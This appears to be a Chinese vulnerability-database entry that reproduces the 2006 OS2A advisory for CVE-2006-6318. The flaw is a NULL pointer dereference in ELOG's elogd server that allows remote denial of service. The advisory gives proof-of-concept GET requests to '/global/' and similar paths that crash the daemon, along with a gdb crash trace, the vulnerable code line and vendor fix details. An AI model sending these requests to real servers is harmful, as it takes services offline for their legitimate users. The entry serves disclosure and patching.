ELOG Web Logbook 'elogd.c' show_elog_list函数拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192337 漏洞类型 其他
发布时间 2006-11-13 更新时间 2007-01-25
CVE编号 CVE-2006-6318 CNNVD-ID CNNVD-200612-591
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/21028
https://cxsecurity.com/issue/WLB-2006120128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-591
|漏洞详情
elog2.6.2及更早版本中的elogd.c中的show_elog_list函数存在拒绝服务漏洞。远程认证用户通过试图访问名字以"global"开始的logbook,导致空指针引用,从而发起拒绝服务攻击(守护程序崩溃)。
|漏洞EXP
Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.
(http://midas.psi.ch/elog/index.html)

Attached is the advisory which details the vulnerability.

Thanks,
OS2A
ELOG Web Logbook Remote Denial of Service Vulnerability

OS2A ID: OS2A_1008			Status:
					10/31/2006	Issue Discovered
				        11/08/2006	Reported to the Vendor
					11/08/2006	Fixed by Vendor
					11/10/2006	Advisory Released

Class: Denial of Service		Severity: Medium

Overview:
---------
The Electronic Logbook (ELOG) is part of a family of applications known as
weblogs. ELOG is a remarkable implementation of a weblog in its simplicity of
use and versatility.
http://midas.psi.ch/elog/index.html

Description:
------------
Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.

The [global]  section in configuration file elogd.cfg is used for settings
common to all logbooks. The vulnerability is due to improper handling of an
HTTP GET request if logbook name 'global' (or any logbook name prefixed
with global) is used in the request. When such a request is received,
a NULL pointer dereference occurs, leading to a crash of the service.

Only authenticated users can exploit this vulnerability if the application
is configured with password.

Impact:
-------
Successful exploitation allows a remote attacker to crash the elogd server.

Affected Software(s):
---------------------
ELOG 2.6.2 (SVN revision 1748) and prior. 
Debian package elog 2.6.2+r1719-1 and prior are also vulnerable.

Proof of Concept:
-----------------
The HTTP GET request given below is sufficient to crash affected server:
http://www.example.com/global/
or
Create a logbook [global_xxx] or [global xxx] in elogd.cfg
and try to access it using a browser.
http://www.example.com/global_xxx/
http://www.example.com/global%20xxx/

Analysis:
-----------
#gdb ./elogd
...
...

(gdb) break show_elog_list
Breakpoint 2 at 0x809d6e0

(gdb) c
Continuing.
(no debugging symbols found)
elogd 2.6.2 built Nov  8 2006, 01:25:48 revision 1699
Falling back to default group "elog"
Falling back to default user "elog"
Indexing logbooks ... done
Server listening on port 8080 ...

Breakpoint 2, 0x0809d6e0 in show_elog_list ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0809eb7a in show_elog_list ()

(gdb) bt
#0  0x0809eb7a in show_elog_list ()
#1  0x00000000 in ?? ()

(gdb) i r
eax            0x0      0
ecx            0x9d43d88        164904328
edx            0x0      0
ebx            0x0      0
esp            0xbfa8aca0       0xbfa8aca0
ebp            0x80df40c        0x80df40c
esi            0xbfb27050       -1078824880
edi            0x0      0
eip            0x809eb7a        0x809eb7a
eflags         0x200246 2097734
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

(gdb) x/i $eip
0x809eb7a <show_elog_list+5274>:        mov    (%eax),%eax

The vulnerable code is at Line:16774 of elogd.c, 
n_msg = *lbs->n_el_index;
where the pointer lbs is dereferenced before being null checked.

--- elogd.c, show_elog_list() -----

} else {
      n_logbook = 1;
      n_msg = *lbs->n_el_index;
   }

msg_list = xmalloc(sizeof(MSG_LIST) * n_msg);

---elogd.c, show_elog_list() -----

CVSS Score Report:
-----------------
    ACCESS_VECTOR          = REMOTE
    ACCESS_COMPLEXITY      = LOW
    AUTHENTICATION         = NOT_REQUIRED
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = NONE
    AVAILABILITY_IMPACT    = COMPLETE
    IMPACT_BIAS            = AVAILABILITY
    EXPLOITABILITY         = FUNCTIONAL
    REMEDIATION_LEVEL      = OFFICIAL_FIX
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 5.0 (AV:R/AC:L/Au:NR/C:N/I:N/A:C/B:A)
    CVSS Temporal Score    = 4.1
    Risk factor            = Medium

Vendor Response:
---------------
Vendor has acknowledged the vulnerability and released a fixed version,
ELOG version 2.6.2-7 (SVN revision 1749).
http://savannah.psi.ch/websvn/log.php?repname=elog&path=%2Ftrunk%2F&rev=
0&sc=0&isdir=1
(Revisions 1746-1749)

Debian has fixed this issue in elog_2.6.2+r1754-1,
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875

Solution:
---------
Install the fixed version,
ELOG version 2.6.2-7 (SVN revision 1749) or later.
http://midas.psi.ch/elog/download.html

For debian, update to elog_2.6.2+r1754-1 or later.

Credits:
-------
Jayesh KS and Arun Kethipelly of OS2A have been credited with the discovery and
analysis of this vulnerability.
|受影响的产品
Elog Web Logbook Elog Web Logbook 2.6.2 SVN revision 1748 Elog Web Logbook Elog Web Logbook 2.6.2 Elog Web Logbook Elog Web Logbook 2.6.1 Elog Web Logbook Elog Web Logbook 2.6 .0 Elog Web L
|参考资料

来源:BID
名称:21028
链接:http://www.securityfocus.com/bid/21028
来源:DEBIAN
名称:DSA-1242
链接:http://www.debian.org/security/2006/dsa-1242
来源:SECUNIA
名称:23580
链接:http://secunia.com/advisories/23580
来源:MISC
链接:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875
来源:BUGTRAQ
名称:20061113ELOGWebLogbookRemoteDenialofServiceVulnerability
链接:http://www.securityfocus.com/archive/1/451351
来源:SECTRACK
名称:1017450
链接:http://securitytracker.com/id?1017450
来源:OSVDB
名称:30272
链接:http://www.osvdb.org/30272
来源:VUPEN
名称:ADV-2006-4423
链接:http://www.frsirt.com/english/advisories/2006/4423
来源:SREASON
名称:2060
链接:http://securityreason.com/securityalert/2060
来源:SECUNIA
名称:22800
链接:http://secunia.com/advisories/22800
来源:FULLDISC
名称:20061112ELOGWebLogbookRemoteDenialofServiceVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0198.html